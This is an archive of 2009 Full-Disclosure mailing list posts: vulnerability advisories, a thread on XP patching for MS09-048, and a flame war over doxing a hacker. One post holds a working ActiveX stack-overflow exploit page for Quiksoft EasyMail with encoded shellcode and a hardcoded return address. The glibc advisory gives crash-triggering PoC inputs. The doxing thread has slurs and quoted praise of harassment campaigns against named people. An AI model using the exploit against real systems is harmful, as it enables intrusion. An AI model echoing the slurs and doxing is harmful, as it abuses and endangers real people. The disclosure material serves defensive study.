Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd
yes. who the fuck is this weev guy, anyway? 2009/9/17 zewb zewbiec...@gmail.com Same here. I wanted to learn about security flaws and instead it's just all these dumb fags pretending they've doxed some big important person. What the fuck is this, 4chan or something? It's full disclosure of security holes, not full disclosure of the full names of people because they trolled the ux designer you have a crush on or something. Stop trying to impress everyone by saying you found some guy's dox. Even if you really did find them, I still don't really care. Apparently you think this weev guy is some kind of celebrity or something, but I've never heard of him and I don't care about the little grudge you have against him, so stop filling my inbox with you're dumb autistic retardery. Seriously, just get a fucking blogspot account or something and post all the shit there so I can go to my fucking inbox and not have to sift through all this shit. - Original Message - *From:* BMF badmotherfs...@gmail.com *To:* full-disclosure@lists.grok.org.uk *Sent:* Wednesday, September 16, 2009 11:27 PM *Subject:* Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd WTF is up with this mailing list? I signed up a few weeks ago expecting full disclosure of security exploits or at least good security discussion. Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be. BMF -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd
he's the wino on the corner sucking your lemon From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of dramacrat Sent: 17. september 2009 08:24 To: zewb Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd yes. who the fuck is this weev guy, anyway? 2009/9/17 zewb zewbiec...@gmail.com Same here. I wanted to learn about security flaws and instead it's just all these dumb fags pretending they've doxed some big important person. What the fuck is this, 4chan or something? It's full disclosure of security holes, not full disclosure of the full names of people because they trolled the ux designer you have a crush on or something. Stop trying to impress everyone by saying you found some guy's dox. Even if you really did find them, I still don't really care. Apparently you think this weev guy is some kind of celebrity or something, but I've never heard of him and I don't care about the little grudge you have against him, so stop filling my inbox with you're dumb autistic retardery. Seriously, just get a fucking blogspot account or something and post all the shit there so I can go to my fucking inbox and not have to sift through all this shit. - Original Message - From: BMF mailto:badmotherfs...@gmail.com To: full-disclosure@lists.grok.org.uk Sent: Wednesday, September 16, 2009 11:27 PM Subject: Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd WTF is up with this mailing list? I signed up a few weeks ago expecting full disclosure of security exploits or at least good security discussion. Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be. BMF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit
!--
I - TITLE
Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX
stack overflow exploit
II - SUMMARY
Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org
Date: September 17th, 2009
Severity: Medium (remote code execution in the user context)
References: http://www.devtarget.org/easymail-advisory-09-2009.txt
III - OVERVIEW
Quote from quiksoft.com: The EasyMail Products are relied upon by over
thousands
of international corporations, federal, state and local organizations,
and individual
developers. Quiksoft has established the EasyMail products as the
professional,
reliable, and easy to use choice for e-mail development. More
information about
the product can be found online at http://www.quiksoft.com.
IV - DETAILS
The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX
component
to facilitate the development of IMAP4-aware applications. The connect()
function
of this component is prone to a classic buffer overflow vulnerability
when a
particularly long argument is passed and the application attempts to
copy that
data into a finite buffer. This allows for the execution of arbitrary
code in the
user context.
V - MITIGATING MEASURES
Either set the killbit for the relevant ActiveX component
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not
considered vulnerable.
VI - NOTES
Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis
Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather
harmless and
executes calc.exe.
Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0
--
html
head
titleQuiksoft EasyMail 6.0.3.0 imap connect() stack overflow/title
script language=JavaScript defer
function Check() {
var buf = 'A';
while (buf.length = 440) buf = buf + 'A';
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape(%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49 +
%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43 +
%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32 +
%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d +
%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e +
%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77 +
%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36 +
%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e +
%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78 +
%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59 +
%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46 +
%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75 +
%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a +
%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b +
%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35 +
%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b +
%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71 +
%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f +
%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33 +
%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63 +
%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73 +
%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70 +
%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66 +
%4e%31%75%74%38%70%65%77%70%43);
var eip = unescape(%0F%DD%17%7D); // Windows XP SP2 English
var nop = unescape(%90%90%90%90%90%90%90%90%90%90%90%90);
var m = buf + eip + nop + shellcode1 + nop;
obj.connect(m);
}
/script
/head
body onload=JavaScript: return Check();
object id=obj classid=clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D
Failed to instantiate object.
/object
/body
/html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 For the fun of it! http://www.bmgsec.com.au/advisory/48/ - -- bmgsec bmgsec [at] gmail.com www.bmgsec.com.au -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkqyHE4ACgkQNAVu4Sd2XpXT7gCgvH1PRz76XNHp0wjr9d7Mtl/C /s0AoOXnQaXnQSFjl4iNHNcK49vZ9xRs =3AM6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
jaded mode off
I know too many of the gook geeks behind Microsoft and I do trust that
this IS NOT a plot to sell more Win7. Granted the marketing folks spun
this bulletin WAY WAY TOO much. It is what it is. I do believe the
architecture in XP just isn't there. It's a 10 year old platform that
sometimes you can't bolt on this stuff afterwards. Even in Vista, it's
not truly fixing the issue, merely making the system more resilient to
attacks. Read the fine print in the patch.. it's just making the system
kill a session and recover better.
I am not a fan of third party because you bring yourself outside the
support window of the product.
It is just a DOS. I DOS myself after patch Tuesday sometimes with mere
patch issues. Also the risk of this appears low, the potential for
someone coding up an attack low... I have bigger risks from fake A/V at me.
Is this truly the risk that one has to take such actions and expect such
energy?
I don't see that it is. Give me more information that it is a risk and
I may change my mind, but right now, I'm just not seeing that it's worth it.
Aras Russ Memisyazici wrote:
:)
Thank you all for your valuable comments... Indeed I appreciated some of the
links/info extended (Susan, Thor and Tom) However, in the end, it sounded
like:
a) As a sysadmin in charge of maintaining XP systems along with a whole
shebang of other mix setups, unless I deploy a better firewall solution, I
seem to be SOL.
b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
PROMISING that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...
So... with all this commentary, in the end, I still didn't read from the
big'uns on whether or not a 3rd party open-source patch would be
released... I sure miss the days that people back in the day who cared would
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P
What free/cheap client-level-IPS solutions block this current attack? Any
suggestions?
Thank you for your time and look forward to some more answers.
Sincerely,
Aras Russ Memisyazici
arasm {at) vt ^dot^ edu -- I set my return addy to /dev/null for... well
you know why!
Systems Administrator
Virginia Tech
-Original Message-
From: Larry Seltzer [mailto:la...@larryseltzer.com]
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
Larry Seltzer
Contributing Editor, PC Magazine
larry_selt...@ziffdavis.com
http://blogs.pcmag.com/securitywatch/
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only default for people running XP standalone/consumer that are
not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub sub
sub set of customer base.
(Bottom line, yes, the marketing team definitely got a hold of that
bulletin)
Thor (Hammer of God) wrote:
Yeah, I know what it is and what it's for ;) That was just my subtle
way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch,
and for which you have no intention of making a patch for, don't tell me
it's mitigated by ancient, unusable default firewall settings, and don't
withhold explicit details. Say THERE WILL BE NO PATCH, EVER. HERE'S
EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK. Also, don't say
'you can deploy firewall settings via group policy to mitigate exposure'
when the firewall obviously
[Full-disclosure] SEC Consult SA-20090917-0 :: RADactive I-Load Multiple Vulnerabilities
SEC Consult Security Advisory 20090917-0 === title: Multiple Vulnerabilities in RADactive I-Load products: RADactive I-Load vulnerable version: = I-Load 2008.2.4.0 fixed version: I-Load 2008.2.5.0 impact: critical homepage: http://i-load.radactive.com/ found: 2009-07-20 by: S. Streichsbier / SEC Consult / www.sec-consult.com === Vendor description: --- I-Load is an ASP.NET component explicitly created to manage image uploading within ASP.NET applications. Unlike other image manipulation libraries, I-Load uses a sophisticated graphical interface which allows the uploading, resizing, cropping and rotating of photos. source: http://i-load.radactive.com/en/documentation/ Vulnerability overview/description: --- The I-Load component contains multiple vulnerabilities which are described below. * Path Disclosure: ** The WebCoreModule.ashx script prints the absolute path of the folder name, where images are saved to, in some requests and responses. This can help an attacker with the exploitation of the also existing file disclosure vulnerability. * Cross Site Scripting: *** Most of the parameters used by WebcodeModule.ashx start with two underscores __ which disables the build-in ASP.NET Anti Cross Site Scripting functionality. Some parameters are not sufficiently validated and can be exploited to inject arbitrary JavaScript into the response. * File Disclosure: ** WebCoreModule.ashx can be exploited by the means of path traversal to read arbitrary files on the server given that the file permissions allow it. An attacker is able to gain sensitive data such as configuration files (e.g. Web.config), the whole source code of the application or other sensitive data on the server. * Arbitrary File Upload: It is potentially possible to upload an arbitrary file using the I-Load Webcontrol with a user-defined file extension. The filename itself is dynamically generated, but it is possible to reproduce that parameter in advance. The file remains on the server for a very short period of time. Nevertheless, during this time frame it could be possible to execute that file and thus compromise the affected server. Proof of Concept: - SEC Consult will not release proof of concept exploits to the public. Vulnerable versions: RADactive I-Load 2008.2.4.0 Prior versions are most likely also vulnerable. Solution: - Immediately upgrade to version 2008.2.5.0 which is available at http://i-load.radactive.com/en/download/. Changelog: http://radnet.radactive.com/forum/Default.aspx?g=postst=339 Vendor contact time line: 2009-09-01: Contacting RADactive. 2009-09-02: Reply from RADactive. 2009-09-02: Preliminary advisory with full vulnerability details was sent to RADactive. 2009-09-09: Reply from RADactive, vulnerabilities have been fixed and a new version has been released. 2009-09-10: Final version of the advisory sent to RADactive and release date was scheduled. 2009-09-10: Reply from RADactive. 2009-09-17: Release of the advisory. Advisory URL: - https://www.sec-consult.com/advisories_e.html#a62 ~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com SEC Consult conducts periodical information security workshops on ISO 27001/BS 7799 in cooperation with BSI Management Systems. For more information, please refer to https://www.sec-consult.com/academy_e.html EOF S. Streichsbier / @2009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
Mapping weev-IRL has no real impact, as he has either an entirely different identity or a DBA, if this was a fictional account on weev's part it would be certainly easy, effective, and feasible for him to change a single letter in his name. For the next part, you might want to grab some calming tea or something... If you've achieved anything it's angering his online persona, these typically only become a bit more malicious and difficult to catch. You've succeeded only in creating an even larger 'weev.' Try posting a home address next time. For bonus points engineer some sort of scheme where the hive becomes enraged and R4L's him. It's been done before, and will be done again by those with real 'talent.' Given that weev has demonstrated competency in all the above I think it prudent that you not associate this disclosure to any of your other online identities. (Brag on IRC already? Who did you work with? You seem to be somewhat close to weev, enough to have a personal vendetta against him, do you know that everyone you've talked with actually hates the guy enough not to drop your pseudonym?) -Travis On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com zewbiec...@gmail.com wrote: what does google earth have to do with any of this? On 9/16/09, GOBBLES gobbles1...@safe-mail.net wrote: What do you mean Sherrod *was* a fed? Obviously the point wasn't to ruin. The point was to salt the earth by filling google with your real name. I can now officially say the (Google) Earth has been salted for you. You'll never be able to live a real life again. You'll always be hiding in the shadows for the rest of your life now. In may not hit you now, but eventually you'll feeling suffering and despair. I'm the one who helped in the process of clipping your wings to keep your grounded. To leave you in the world where mediocrity will never come. You are a monster for what you did to Kathy... She's a great UX designer and a beautiful woman... Sincerely, Tim O'Reilly Btw all dogs go to heaven was awesome you fucking faggot Original Message From: Andrew A glutt...@gmail.com To: GOBBLES gobbles1...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd Date: Tue, 15 Sep 2009 23:52:42 -0500 Okay. You've been in contact with Hep? She's handed over her logs? Oh man, the FBI now has hundreds of megs of me scrolling ansi on IRC, telling her she's a sickly withered ghoul, calling her fat, and making fun of her Springeresque living situation of having 3 different kids by 3 different dads (seriously hep is basically the hip web2.0 version of used up trailer trash whore). Oclet's handed over his logs? Wow, the FBI now has records of all the times I've told him to stop doing cocaine and drinking and clean up his act. Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI now has all the records of me posting the information of people with autism to Encyclopedia Dramatica! I'm goin' down! Tehdely, the gay San Francisco Jew who works for blogging house Six Apart will be able to tell a jury that I, in the haze of a 5-balloon dose of nitrous oxide, did a sieg heil salute and shouted heil hitler while giggling hysterically. I, clearly, will be screwed by this revelation of SECRET KNOWLEDGE in the grand jury proceedings. And actually, you can make your living off of advertising and selling t-shirts. I made high sfigs off of direct marketing alone for several years. You antis are pathetic. You think you got one up on me by pasting some fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is these days? Are you gonna start syndicating emo rants from 14 year old girls into f-d posts with ascii banners at the top, acting like you owned people? See, for a doxdrop to be proper, you have to do info that is not already public, and you have to tie it together in a way that reveals something about their lives that they did not want people to know. For example, when some clever soul revealed that Rob Levin of freenode didn't actually live in a trailer, had all sorts of welfare and was still using people's donations to supplement his income, that was a pretty sweet doxdrop: http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/ Or when somebody pieced together Kathy Sierra's sordid history of dick sucking, that was pretty fuckin' awesome: http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html You, sir, are a fucking amateur. You haven't uncovered anything new (the most well funded law enforcement organization in the world had to do that for you in their organized campaign, and you copied it from my livejournal), and it is certainly not anything I tried to hide, as I put it in my fucking blog. No secrets uncovered, no dark past revealed, just shit you copied from my livejournal to full-disclosure. Doxdrop is not copy and paste. You
[Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief
http://www.ipetitions.com/petition/mudge4cyberczar/index.html This petition is posted in support for the nomination of Peiter Zatko (aka mudge) to the President's post of Cybersecurity Chief. We've all seen how effective past efforts have been regarding this initiative, and realize the importance of nominating someone who understands not only all facets of cybersecurity, but has garnered the respect of both peers and adversaries in the space. Dr. Zatko's bio is available at: http://en.wikipedia.org/wiki/P... and http://www.allbusiness.com/gov... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd
On Wed, Sep 16, 2009 at 9:27 PM, BMF badmotherfs...@gmail.com wrote: WTF is up with this mailing list? I signed up a few weeks ago expecting full disclosure of security exploits or at least good security discussion. Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be. BMF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This list publishes exactly what you're looking for. If you can't handle the occasional soap opera or jizzing ASCII swastika cock all over your e-mail message, maybe you should just stick with Bugtraq and Secunia. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
Good geeks ...not gook geeks.
It's not a racial slight, it's spellchecker not working and I didn't
realize I spelled it wrong. My deepest apologies if anyone reads that
wrong.
Hisashi T Fujinaka wrote:
On Thu, 17 Sep 2009, Susan Bradley wrote:
jaded mode off
I know too many of the gook geeks behind Microsoft and I do trust
that this
You do realize this can be read as a racial slight towards Koreans.
IS NOT a plot to sell more Win7. Granted the marketing folks spun
this bulletin WAY WAY TOO much. It is what it is. I do believe the
architecture in XP just isn't there. It's a 10 year old platform
that sometimes you can't bolt on this stuff afterwards. Even in
Vista, it's not truly fixing the issue, merely making the system more
resilient to attacks. Read the fine print in the patch.. it's just
making the system kill a session and recover better.
I am not a fan of third party because you bring yourself outside the
support window of the product.
It is just a DOS. I DOS myself after patch Tuesday sometimes with
mere patch issues. Also the risk of this appears low, the potential
for someone coding up an attack low... I have bigger risks from fake
A/V at me.
Is this truly the risk that one has to take such actions and expect
such energy? I don't see that it is. Give me more information that
it is a risk and I may change my mind, but right now, I'm just not
seeing that it's worth it.
Aras Russ Memisyazici wrote:
:)
Thank you all for your valuable comments... Indeed I appreciated
some of the
links/info extended (Susan, Thor and Tom) However, in the end, it
sounded
like:
a) As a sysadmin in charge of maintaining XP systems along with a whole
shebang of other mix setups, unless I deploy a better firewall
solution, I
seem to be SOL.
b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was
stated
earlier, they did the exact same thing back in Win2K days... Nothing
new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
PROMISING that they would continue supporting XP since they didn't
exactly
state WHAT they would support, they seem to be legally free to
actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when
it comes
to promises...
So... with all this commentary, in the end, I still didn't read from
the
big'uns on whether or not a 3rd party open-source patch would be
released... I sure miss the days that people back in the day who
cared would
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm
misunderstanding, he's
suggesting switching to an iptables based protection along with a
registry
tweak... ahh the good ol' batch firewall :) Would this actually work
as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything
these
days :P
What free/cheap client-level-IPS solutions block this current
attack? Any
suggestions?
Thank you for your time and look forward to some more answers.
Sincerely,
Aras Russ Memisyazici
arasm {at) vt ^dot^ edu -- I set my return addy to /dev/null
for... well
you know why!
Systems Administrator
Virginia Tech
-Original Message-
From: Larry Seltzer [mailto:la...@larryseltzer.com] Sent: Wednesday,
September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
Larry Seltzer
Contributing Editor, PC Magazine
larry_selt...@ziffdavis.com http://blogs.pcmag.com/securitywatch/
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only default for people running XP standalone/consumer that
are not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub
sub sub set of customer base.
(Bottom line, yes, the marketing team definitely got a hold of that
bulletin)
Thor (Hammer of God) wrote:
Yeah, I know what it is and what it's for ;) That was just my subtle
way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch,
and
[Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief
lol, best troll attempt since n3td3v and gobbles got banned The Sp3ctacle sp3cta...@gmail.com wrote: http://www.ipetitions.com/petition/mudge4cyberczar/index.html This petition is posted in support for the nomination of Peiter Zatko (aka mudge) to the President's post of Cybersecurity Chief. We've all seen how effective past efforts have been regarding this initiative, and realize the importance of nominating someone who understands not only all facets of cybersecurity, but has garnered the respect of both peers and adversaries in the space. Dr. Zatko's bio is available at: http://en.wikipedia.org/wiki/P... and http://www.allbusiness.com/gov... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief
The Sp3ctacle wrote: http://www.ipetitions.com/petition/mudge4cyberczar/index.html This petition is posted in support for the nomination of Peiter Zatko (aka mudge) to the President's post of Cybersecurity Chief. We've all seen how effective past efforts have been regarding this initiative, and realize the importance of nominating someone who understands not only all facets of cybersecurity, but has garnered the respect of both peers and adversaries in the space. Dr. Zatko's bio is available at: http://en.wikipedia.org/wiki/P... and http://www.allbusiness.com/gov... Yeah, because if it is one thing he wants, it is a powerless figurehead position of bureaucracy and politics. There is a reason why nobody stays in the high level (US) information security roles for long. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason: glibc x=2.10.1 stdio/strfmon.c Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ glibc x=2.10.1 stdio/strfmon.c Multiple vulnerabilities ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 10.03.2008 - - Pub.: 17.09.2009 CVE: CVE-2008-1391 Risk: High Affected Software (tested 27.08.2009): - - Fedora 11 - - Slackware 12.2 - - Ubuntu 9.04 - - others linux distributions Original URL: http://securityreason.com/achievement_securityalert/67 Previous URL: http://securityreason.com/achievement_securityalert/53 - --- 0.Description --- strfmon -- convert monetary value to string The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character. SYNOPSIS: #include monetary.h ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. glibc x=2.10.1 stdio/strfmon.c Multiple vulnerabilities --- In March 2008, our team has published a security note (SREASONRES:20080325) about vulnerabilities in strfmon(3) function. Issue has been officially diagnosed in NetBSD, FreeBSD and MacOSX. However, from the source code due to a glibc also is vulnerable to. We have informed glibc team. However, the description of the issue and fix was not enough for gnu team. They has changed status for BOGUS and response was: - --- And what exactly does an BSD implementation has to do with glibc? - --- Today we now, only NetBSD is secure for this. And all systems uses glibc are affected. Despite the differences in the code NetBSD libc and glibc, issue is the same but the exploit differs from that presented in (SREASONRES:20080325). Description of the vulnerabalitie: http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325) http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/ Description of the fix: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc To present this issue in Fedora 11, we will use php client. money_format() use strfmon(3) function so this program will be perfect. [...@localhost ~]$ php -r 'money_format(%.1073741821i,1);' Segmentation fault for 'money_format(%.1073741821i,1);' we will get Program received signal SIGSEGV, Segmentation fault. 0x0019331a in __printf_fp () from /lib/libc.so.6 (gdb) bt #0 0x0019331a in __printf_fp () from /lib/libc.so.6 #1 0x0018832b in __vstrfmon_l () from /lib/libc.so.6 #2 0x00187a36 in strfmon () from /lib/libc.so.6 strfmon() will call to __printf_fp() with overflowed arg. In result (gdb) x/20s ($esi)-10 0x8448ff6: 0x8448ff7: 0x8448ff8: 0 0x8448ffa: 0x8448ffb: 0x8448ffc: 0 0x8448ffe: 0x8448fff: 0x8449000: Address 0x8449000 out of bounds 0x8449000: Address 0x8449000 out of bounds 0x8449000: Address 0x8449000 out of bounds ... (gdb) i r eax0x30 48 ecx0x0 0 edx0x0 0 ebx0x2bdff4 2875380 esp0xbfffec14 0xbfffec14 ebp0xbfffed78 0xbfffed78 esi0x8449000138711040 edi0x810c 33036 eip0x19331a 0x19331a __printf_fp+3274 Now let's see what will hapen for 'money_format(%.1073741822i,1);' Program received signal SIGSEGV, Segmentation fault. 0x0034b27b in hack_digit.12295 () from /lib/libc.so.6 php will crash in hack_digit(). (gdb) i r eax0x3ffe 1073741822 ecx0x32 50 edx0x2 2 ebx0x476ff4 4681716 esp0xbfffebc4 0xbfffebc4 ebp0xbfffebf4 0xbfffebf4 esi0x32 50 edi0x3e 62 we can try change edi register. For 'money_format(%.1073741824i,1);' (gdb) i r eax0x4000 1073741824 ecx0x32 50 edx0x2 2 ebx0x35bff4 3522548 esp0xbfffebbc 0xbfffebbc ebp0xbfffebec 0xbfffebec esi0x32 50 edi0x42 66 But let's see what will hapen for 'money_format(%.77715949976712904702i, 1.1);' crash in Program received signal SIGSEGV, Segmentation fault. 0x00e4327b in hack_digit.12295 () from /lib/libc.so.6 (gdb) i r eax0x3ffe 1073741822 ecx0x34 52 edx0x2 2 ebx0xf6eff4 16183284 esp0xbfffebb4 0xbfffebb4 ebp0xbfffebe4 0xbfffebe4 esi0x34 52 edi0x3e 62 esi 52. Interesting is that the PHP memory_limit has no control over what will happens in the level of the libc. Function strfmon(3) can
Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
On http://support.microsoft.com/gp/lifepolicy MS says that the
Extended Support Phase includes Security Update Support. If I have
a Premier Support contract (which entitles me to Extended Support)
aren't MS contractually obliged to make this fix available to me?
2009/9/16 Aras Russ Memisyazici nowh...@devnull.com:
:)
Thank you all for your valuable comments... Indeed I appreciated some of the
links/info extended (Susan, Thor and Tom) However, in the end, it sounded
like:
a) As a sysadmin in charge of maintaining XP systems along with a whole
shebang of other mix setups, unless I deploy a better firewall solution, I
seem to be SOL.
b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
